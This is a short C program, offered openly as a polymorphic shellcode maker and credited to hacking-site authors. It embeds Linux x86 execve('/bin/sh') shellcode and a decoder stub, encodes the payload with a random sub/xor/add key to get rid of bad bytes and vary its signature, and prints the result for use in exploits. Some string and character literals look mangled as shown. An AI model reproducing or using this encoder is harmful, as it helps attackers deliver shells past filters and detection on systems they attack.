A polymorphic shellcode maker
/* A polymorphic shellcode maker original prorgam created by Rizki Wicaksono(http://www.ilmuhacking.com) i add some functions to make it more interesting, i add "sub,add" functions beside the original xor into decoder otoy(http://otoyrood.wordpress.com) 0x82010 */ #include <sys/time.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int getnumber(int quo) { int seed; struct timeval tm; gettimeofday( &tm, NULL ); seed = tm.tv_sec + tm.tv_usec; srandom( seed ); return (random() % quo); } void print_code(char *data) { int i,l=0; for (i = 0; i < strlen(data); ++i) { if (l==0) { printf("""); } if (l >= 15) { printf(""n""); l = 0; } printf("\x%02x", ((unsigned char *)data)[i]); ++l; } printf("";nn"); } int main() { char shellcode[] = /* "/bin/sh" shellcode*/ /* put our own shellcode here */ "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"; int count; int number = getnumber(200); int badchar = 0; int ldecoder; int lshellcode = strlen(shellcode); char *result; char decoder[] = "\xeb\x13\x5e\x31\xc9\xb1\x00\x80\x06\x00\x80\x36\x00\x80\x2e" "\x00\x46\xe2\xf4\xeb\x05\xe8\xe8\xff\xff\xff"; decoder[6] = lshellcode; decoder[9] = number; decoder[12]= number; decoder[15]= number; ldecoder = strlen(decoder); do { if(badchar == 1) { number = getnumber(10); decoder[9] = number; decoder[12]= number; decoder[15]= number; badchar = 0; printf("New Key: %2xn", number); } for(count=0; count < lshellcode; count++) { shellcode[count] = shellcode[count] - number; shellcode[count] = shellcode[count] ^ number; shellcode[count] = shellcode[count] + number; if(shellcode[count] == '') { badchar = 1; } } } while(badchar == 1); decoder[8] = 46; decoder[14] = 6; result = malloc(lshellcode + ldecoder); strcat(result,decoder); strcat(result,shellcode); printf("Key: %02xn",number); print_code(result); }